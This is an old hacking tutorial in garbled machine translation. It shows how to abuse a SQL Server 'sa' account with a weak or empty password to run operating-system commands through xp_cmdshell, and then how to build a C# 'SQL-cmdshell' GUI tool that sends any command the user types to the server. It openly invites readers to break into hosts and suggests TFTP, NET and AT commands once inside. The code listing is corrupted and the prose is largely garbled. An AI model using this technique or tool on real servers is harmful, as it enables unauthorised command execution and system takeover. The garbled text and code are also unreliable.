Use VC # easy to make SQL cmdshell
(Author: mikespook | Published: 2003-10-7 | Views: 354)
Keywords: C #, database, extended stored procedure, vulnerability this article has submitted "hacking security base". The article is "hacker safety base", and it is not necessary to reprint without the "hacking security base". Thank you for your cooperation! Do you want to invade? Want to get the administrator privilege of the system? I want to operate at anyone on the palm of the palm of the palm? what will you do? Use a scanner violent to crack the administrator password? Still remote overflow? If these technologies for operating system-level intrusion, you don't feel your appetite, why don't you try it? Don't go, do you have a window! Sometimes we don't have to stare at the password of the operating system, because the passwords for other services provided by the system will be easier. When you run a variety of scanners, have you seen the system that provides SQL Server services? Have you encountered a scanner to report SA user passwords for SQL Server or is a weak password? If your answer is yes, do you have to use this vulnerability to reach the purpose of your invading host? Come, let's take a look at the SA user permissions with a SQL Server we can do something. When we have SA permission to SQL Server, we can perform extended stored procedures XP_cmdshell. Using the Query Analyzer Log in with a SA user, any possible statement is performed by XP_cmdshell to perform any of the features we expected. For example, we got a SA password "123456" called "M-S" computer. Then we start the SQL query analyzer (this tool is included in the client of SQL Server), fill in the computer name, user name, password, and press OK to log in to the SQL Server. As shown in Figure 1: Figure 1 Let's first check the contents of this computer C drive root directory. "XP_cmdshell" DIR C: / "can be entered in the query analyzer. There will be the result shown in Figure 2: Figure 2 everyone saw it? The result of this statement is the content in this computer C drive root directory. You may say, what can I do in the root directory? Then we change your command to perform: TFTP, NET, AT ... These commands aren't you dreaming of to execute on the computer you want to invade? And all we did not scan for the ADMINISTRATOR password for the operating system. Because the SQL Server intrusion uses the administrator privilege that does not require the operating system. However, it is inconvenient to use the SQL query analyzer. And to install the SQL query analyzer, you must install SQL Server Client. If you don't say anything else, install this steps and precautions, you will be enough for me to cheat more. So since we already know the principles, why not write a tool yourself? Below, we use the .NET in system.data.sqlclient namespaces to connect to the SQL Server class with VC # to write a SQL-cmdshell. Is it a little dizzy to use VC # making sql-cmdshell? Also to connect the SQL database, it is also necessary to perform an extended stored procedure. do not worry! Since the function in the .NET class library is too strong, we need to hand-written code that is less than 40 lines. Below, I will say a specific writing method. Of course, according to my habit, or first make the interface we need (Figure 3): Figure 3 Newly built a Windows application project in VC #, named SQLCMD. In the following description, the contents in parentheses are control attribute settings that need to be modified, and the default value is retained for the attributes that are not illustrated.
Add a group box (Name: Groupbox1 Text: SQL server) on the form (Name: frmmain text: sql-cmdshell). Add three tags to group boxbox1 (Name: Label1 Text: SQL Server, Name: Label2 TEXT: User Name, Name: Label3 Text: Password) and Three Text Boxes (Name: TXTSERVER, NAME: TXTID text: SA, Name: txtpassword passwordchar: *). At the same time, add a check box (name: cbnullpassword text: empty password) to the group box. Add a list box on the form frmmain (Name: LBResult HorizontalscrollBar: True Tabstop: False), a tab (name: label4 text: command), a combo box (name: cbcmd) and a button (name: btncmd text: carried out). Finally, add a status bar (Name: Statusbar1) and add two panels on the mount bar (Name: SBP Text: Status Width: 40, Name: Sbpmsg). At the same time, for the sake of beauty, you can adjust the Anchor properties of the control. Also add two non-visual data controls. These two controls are in the "data" item of the control panel. It is good for SqlConnection (Name: SqlConn) and SQLCommand (Name: Sqlcomm Connection: SqlConn), the interface is there, and the rest is encoded. CheckedChanged events checkbox cbNULLPassword added in the following code: private void cbNULLPassword_CheckedChanged (object sender, System.EventArgs e) {txtPassword.Enabled = cbNULLPassword.Checked;!} Thus, for elected blank password when the password box is unavailable. Perhaps a reader will ask questions: Is this a bit more? When SA is empty password, can we fill in the password box? This is of course ok, but it is not perfect enough. I will explain this later why I want to add such a check box. Add the following code in the KeyPress event of the combination box CBCMD: private void cbcmd_keypress (Object sender, system.windows e) {if ('/ n' == e.keychar) btncmd_click (sender, e);} When the combo box gets the focus, press the back to the return, it is equivalent to clicking the button BTNCMD. Ok, let's write the most core part. For convenience, I added a line number in front of the code.
10 private void btncmd_click (object sender, system.eventargs e) 20 {30 try40 {50 sbpmsg.text = "command '" cbcmd.text "' is executing ..."; 60 this.cursor = Cursors.Waitcursor; 70 string pw = null; 80 if (! Cbnullpassword.checked 90 pw = "password =" txtpassword.text ";"; 100 SQLConn.connectionstring = "initial catalog = master;" PW "PERSIST Security Info = " (! cbnullpassword.checked) .tostring () "; user ID = " txtid.text "; workStation id = " txtserver.text "; packet size = 4096 "; 110 sqlcomm.commandtext =" xp_cmdshell 'Cmd / c " cbcmd.text "' "; 120 sqlcomm.connection.open (); 130 lbresult.Items.add (" ★★★★★ / " cbcmd.text " / "★★ ★★★] "); 140 SqldataReader Reader = SQLComm.executeReader (); 150 while ()) 160 {170 if (! Reader.Indbnull (0)) 180 lbresult.Items.add (Reader.getstring) 0)); 190} 200 sbpmsg.text = "command '" cbcmd.text "execute success!"; 210 sqlcomm.connection.Close (); 220 lbresult.Items.add ("★★★★★ / " cbcmd.text " / "★★★★★]"); 230 lbresult.items.add (""); 240 if (! cbcmd.Items.contains) (cbcmd.tex T)) 250 cbcmd.items.insert (0, cbcmd.text); 260 cbcmd.text = null; 270 lbresult.selectedIndIndex = lbresult.items.count - 1; 280 this.cursor = cursors.default; 290} 300 catch (Exception EX) 310 {320 this.cursor = cursors.default; 330 sbpmsg.text = ex.Message; 340} 350} Let me explain the code above. The 50 line is that the current command is running in the status bar. When the entire program throws an exception during the execution, it will capture an exception at 300 rows. The reason why the captured exception will be prompted in the 330 line. Since some orders may perform a long time, the 60-course will turn the mouse into a styles that are waiting. And after the command is completed, the normal mouse is restored at the 280 line.
